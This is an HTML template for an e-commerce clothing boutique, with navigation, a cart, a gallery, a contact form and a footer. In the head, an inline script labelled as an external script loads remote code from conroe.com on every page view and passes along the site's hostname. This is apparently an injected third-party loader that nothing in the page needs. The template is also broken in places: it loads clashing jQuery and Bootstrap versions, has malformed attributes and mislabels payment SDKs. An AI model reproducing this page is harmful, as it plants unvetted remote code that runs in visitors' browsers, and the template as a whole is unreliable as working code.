<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <meta name="description" content="Add your website description here">
  <meta name="keywords" content="Add, your, keywords, here">
  <meta name="author" content="Your Name">
  <meta name="robots" content="index, follow">
  <meta name="theme-color" content="#ffffff">
  <meta name="format-detection" content="telephone=no">
  <meta http-equiv="Content-Language" content="en">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@yourtwitterhandle">
  <meta name="twitter:title" content="Your Website Title">
  <meta name="twitter:description" content="Add your website description here">
  <meta name="twitter:image" content="https://example.com/your-image.jpg">
  <meta property="og:title" content="Your Website Title">
  <meta property="og:type" content="website">
  <meta property="og:url" content="https://example.com">
  <meta property="og:image" content="https://example.com/your-image.jpg">
  <meta property="og:description" content="Add your website description here">
  <meta property="og:site_name" content="Your Website Name">
  <meta property="og:locale" content="en_US">

  <title>boutique</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <link rel="icon" href="img/favicon.png">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
    integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
  <link rel="stylesheet" type="text/css" href="https://cdn.example.com/tool.css">



  <!-- Additional tools or libraries -->
  <script src="https://cdn.example.com/tool.js"></script>
  <script src="https://cdn.example.com/tool2.js"></script>
  <script src="https://cdn.example.com/tool3.js"></script>





  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
  <script src="/admin_l_t_e/plugins/jQuery/jQuery-2.1.4.min.js"></script>


  <!-- Font Awesome and other stylesheets -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fullcalendar/3.8.0/fullcalendar.min.css">

  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">

  <script src="https://kit.fontawesome.com/your-fontawesome-kit.js" crossorigin="anonymous"></script>








  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

  <!-- costom css-->
  <link rel="stylesheet" href="style.css">
  <link rel="stylesheet" href="styles.css">

  <!-- jQuery library -->
  <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>

  <!-- Bootstrap JavaScript -->
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
  <script src="script.js"></script> <!-- Include the separate JavaScript file -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>


  <!-----Extirnal scripts----->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script
    type="text/javascript">window.top === window && !function () {var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conroe.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e)}();</script>

  <!-----Paypal----->
  <script src="https://www.paypalobjects.com/api/checkout.js"></script>
  <!-----Stripe----->
  <script src="https://js.stripe.com/v3/"></script>

  <!-----internet Banking----->


  <!-----Google Pay----->
  <script src="https://pay.google.com/gp/p/js/pay.js" data-merchant-id="your-merchant-id"></script>
  <!-----Apple Pay----->
  <script src="https://applepay.cdn-apple.com/jsapi"></script>
  <!-----Amazon Pay----->
  <script src="https://sdk.amazonaws.com/js/aws-sdk-2.730.0.min.js"></script>



  <!-----Social media SDK----->
  <script src="https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v11.0&appId=your-app-id"></script>
  <script src="https://platform.twitter.com/widgets.js" async></script>
  <script src="https://platform.linkedin.com/badges/js/profile.js" async defer></script>

  <!-----Google Analytics----->


  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-12345678-9"></script>


  <script>
        // Your custom scripts here
        // You can use JavaScript to add interactivity or functionality to your website

  </script>
</head>

<body>

  <!-- Your HTML body content goes here -->

  <!-- Example Header -->
  <header>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
      <a class="navbar-brand" href="#"><img
          src="https://img.freepik.com/free-vector/fashion-logo-editorial-template_23-2148701248.jpg" alt="Logo"
          width="50" height="50">
      </a>

      <div class="brand-name">E-commerce <br> Boutique</div>

      <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
        aria-controls="navbarNav" aria-expanded="True" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>





      <div class="collapse navbar-collapse" id="navbarNav">
        <ul class="navbar-nav ml-auto">

          <li class="nav-item">
            <a class="nav-link" href="index.html">Home</a>
          </li>

          <li class="nav-item">
            <a class="nav-link" href="sigl.html">Shop</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="main.html">Products</a>
          </li>
          <li class="nav-item dropdown">
            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown"
              aria-haspopup="true" aria-expanded="false">
              More
            </a>
            <div class="dropdown-menu" aria-labelledby="navbarDropdown">
              <a class="dropdown-item" href="product.html">Products</a>
              <a class="dropdown-item" href="/Shopping-Cart/main.html"">FAQ</a>
              <a class=" dropdown-item" href="Cart/cart-button.html">Support</a>
              <a class="dropdown-item" href="about.html">About Us</a>
              <a class="dropdown-item" href="single.html">Our Services</a>
              <a class="dropdown-item" href="single-product.html">Features</a>
              <a class="dropdown-item" href="contact-us.html">Contact Us</a>
            </div>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="#"><i class="far fa-bell"></i></a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="#"><i class="far fa-envelope"></i></a>
          </li>



          <li class="nav-item">
            <!-- Language Switcher as a Select Dropdown -->

            <select onchange="location = this.value;">
              <option value="?lang=en">English</option>
              <option value="?lang=es">Español</option>
              <option value="?lang=fr">Français</option>
              <option value="?lang=de">Deutsch</option>
              <option value="?lang=it">Italiano</option>
              <option value="?lang=pt">Português</option>
              <option value="?lang=ar">العربية</option>
              <option value="?lang=zh">中文</option>
              <option value="?lang=ru">Русский</option>
              <option value="?lang=ja">日本語</option>
              <option value="?lang=ko">한국어</option>
              <option value="?lang=tr">Türkçe</option>
              <option value="?lang=vi">Tiếng Việt</option>
              <option value="?lang=in">हिन्दी</option>
              <option value="?lang=id">Bahasa Indonesia</option>
              <option value="?lang=el">Ελληνικά</option>
            </select>
          </li>


          <li class="nav-item">
            <a class="nav-link" href="languages.php">
              <i class="fas fa-globe"></i> Lang
            </a>
          </li>

          <hr style="color: blueviolet;font-size: large;border: none;width: 2px;">
          <div class="dropdown">
            <a class="btn btn-secondary dropdown-toggle" href="#" role="button" id="dropdownMenuLink"
              data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="far fa-user-circle"></i></a>
            <div class="dropdown-menu" aria-labelledby="dropdownMenuLink">
              <a class="dropdown-item" href="#"><i class="far fa-user-circle">

                </i> Profile </a>
              <a class="dropdown-item" href="sp.html"><i class="fas fa-cog"></i> Settings & Privacy</a>
              <a class="dropdown-item" href="p.html"><i class="far fa-bell"></i> Subscribe</a>
              <a class="dropdown-item" href="p-c.html"><i class="fas fa-crown"></i> Premium</a>
              <a class="dropdown-item" href="p-slide.html"><i class="fas fa-question-circle"></i> Help & Support</a>
              <div class="dropdown-divider"></div>
              <a class="dropdown-item" href="#"><i class="fas fa-sign-out-alt"></i> Sign-Out</a>
            </div>
          </div>



          <!-- Cart -->
          <li class="nav-item">
            <a class="nav-link shopping-cart-link" href="#" onclick="toggleCart()">
              <i class="material-icons">local_mall</i>
              <span id="cart-count">0</span>
            </a>
          </li>

          <!-- Cart Container -->
          <div class="cart-container" id="cartContainer">
            <button class="close-btn" onclick="toggleCart()">Close</button>
            <p>Your Cart:</p>
            <ul id="cartItemsList">
              <!-- Cart items will be dynamically added here -->
            </ul>
            <p>Total: <span id="cartTotal">0</span></p>
            <button class="checkout-button" onclick="checkout()">Checkout</button>
          </div>

          </li>






          <!-- ... Other navigation items ... -->

        </ul>
      </div>
    </nav>
    <!-- Your header content goes here -->
  </header>



  <img src="shopping-cart-icon.png" alt="Shopping Cart" class="floating-cart">
  <a href="https://www.freepnglogos.com/images/shopping-bag-36982.html">Get it on shopping bag png</a>

  <!----------------------Welcome section -------------------------->

  <div class="welcome-section">
    <div class="column left-column"></div>
    <div class="column center-column">
      <div class="center-content">

        <p>Curated Fashion Just for You</p>
        <p>Éliotle Boutique offers a wide selection
          of trendy and stylish clothing
          for all gender of all shapes and sizes. <br>
          Our collection includes everything from casual wear to elegant evening gowns. <br>
          We believe that every woman should feel confident and beautiful in their own skin. <br>
          Shop our collection to find the perfect outfit for any occasion.</p>
      </div>
    </div>
    <div class="column right-column"></div>
  </div>
  <!------Products ----->

  <div class="products" id="products">
    <div class="title">PRODUCT LIST</div>
    <div class="listProduct">
      <!-- Product cards will be dynamically added here -->



    </div>
  </div>
  </div>



















  <!----------------------  Our selection -------------------------->
  <div class="Our-selection">
    <div class="contents">

      <h3>Our Selection</h3>
      <p style="color: darkblue;">At Éliotle Boutique, we offer a carefully curated selection <br>of high-quality
        clothing,
        accessories, and
        beauty products. <br>Our products are sourced from local businesses and ethically made brands. <br>We
        believe in
        supporting our community and making a positive impact on the world.<br>Browse our selection to discover new
        favorites.</p>


    </div>
  </div>




  <div class="Our-story">
    <div class="content">

      <h3>Éliotle Boutique</h3>

      <p>Passionate about sustainable fashion,<br>
        Éliotle Boutique believes in style with a purpose.<br>
        Built on simplicity, quality, and social responsibility,<br>
        we strive for a positive impact on the environment.<br>
        Join us on our journey to create eco-friendly,<br>
        stylish choices.</p>

    </div>
  </div>

  <!----------------------  slide banner -------------------------->






  <!----------------------  Gallery -------------------------->
  <div class="Photogallery">
    <div id="Gallery">
      <h1>Gallery</h1>
      <p style="text-align: center; justify-content: center; color: darkblue;">Explore our captivating gallery
        featuring
        stunning moments
        and beautiful memories
        captured through our lens.
      </p>


      <div class="gallery">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 1">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 2">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 3">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 4">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 5">

        <img
          src="https://img.freepik.com/free-photo/graphic-tshirt-trendy-design-mockup-presented-wooden-hanger_460848-14026.jpg"
          alt="Image 6">


        <!-- Image gallery content goes here -->
      </div>
    </div>
  </div>




  <!----------------------  footer -------------------------->

  <footer>
    <div class="container">
      <div class="row">
        <div class="col-md-3">
          <h4>Contact Us</h4>

          <form class="contact-form" action="contact-us.php" method="post">
            <div class="name-group">
              <input type="text" name="firstname" placeholder="First Name" required>
              <input type="text" name="surename" placeholder="Surename">
            </div>
            <input type="email" name="email" placeholder="Your Email" required>
            <textarea name="message" placeholder="Your Message" rows="4" required></textarea>
            <button type="submit">Send Message</button>
          </form>
        </div>
        <div class="col-md-3">
          <h4>Categories</h4>
          <ul>
            <li><a href="pro.html"><i class="fa fa-shopping-bag"></i>Fashion</a></li>
            <li><a href="#"><i class="fa fa-hat-cowboy"></i>Accessories</a></li>

            <li><a href="stripe/public/checkout.html"><i class="fa fa-laptop"></i>Electronics</a></li>
            <li><a href="#"><i class="fa fa-cogs"></i>Engine</a></li>

            <li><a href="xl.html">Home &amp; Garden</a></li>
            <li><a href="payment.html">Beauty</a></li>

          </ul>
        </div>
        <div class="col-md-3">
          <h4>Customer Service</h4>
          <ul>
            <li><a href="contact-us.html"><i class="fa fa-envelope"></i>Contact Us</a></li>
            <li><a href="#"><i class="fa fa-phone"></i>Call Us</a></li>
            <li><a href="our-payment.html"><i class="fas fa-credit-card"></i>Payment option</a></li>

            <li><a href="Delivery.html"><i class="fa fa-truck"></i>Delivery</a></li>
            <li><a href="Returns.html"><i class="fa fa-undo"></i>Returns & Exchanges</a></li>
            <li><a href="faqs.html"><i class="fas fa-question"></i>FAQs</a></li>
          </ul>
        </div>
        <div class="col-md-3">
          <h4>Follow Us</h4>
          <ul class="social-Media">
            <li><a href="https://www.facebook.com/your_facebook_profile" target="_blank"><i
                  class="fa fa-facebook"></i>Facebook</a></li>
            <li><a href="https://www.instagram.com/your_instagram_profile" target="_blank"><i
                  class="fa fa-instagram"></i>Instagram</a></li>

            <li><a href="https://www.youtube.com/channel/your_youtube_channel_profile" target="_blank"><i
                  class="fa fa-youtube"></i>YouTube </a></li>
            <li><a href="https://www.pinterest.com/your_pinterest_profile" target="_blank"><i
                  class="fa fa-pinterest"></i>Pinterest</a></li>

            <li><a href="https://www.tumblr.com/your_tumblr_profile" target="_blank"> <i
                  class="fa fa-tumblr"></i>Tumblr</a>
            </li>


            <li><a href="https://www.skype.com/your_skype_profile" target="_blank"><i class="fa fa-skype"></i>Skype</a>
            </li>

            <li><a href="https://www.reddit.com/user/your_reddit_profile" target="_blank"><i
                  class="fa fa-reddit"></i>Reddit</a></li>

            <li><a href="https://www.quora.com/profile/your_quora_profile" target="_blank"><i
                  class="fa fa-quora"></i>Quora</a></li>

            <li><a href="https://www.flickr.com/photos/your_flickr_profile" target="_blank"><i
                  class="fa fa-flickr"></i>Flickr </a></li>

            <li><a href="https://www.github.com/your_github_profile" target="_blank"><i
                  class="fa fa-github"></i>Github</a>
            </li>

            <li><a href="https://www.codepen.io/your_codepen_profile" target="_blank"><i
                  class="fa fa-codepen"></i>Codepen</a>
            </li>

            <li><a href="https://www.stackoverflow.com/users/your_stackoverflow_profile" target="_blank"><i
                  class="fa fa-stack-overflow"></i>Stackoverflow </a></li>




          </ul>
        </div>
      </div>
      <div class="row">
        <div class="col-md-12">
          <hr>
          <p>&copy; 2021 My eCommerce Store. All Rights Reserved.</p>
        </div>
      </div>
    </div>
    <!-- Social media icons and links go here -->
  </footer>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>










  <script src="script.js"></script>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
</body>

</html>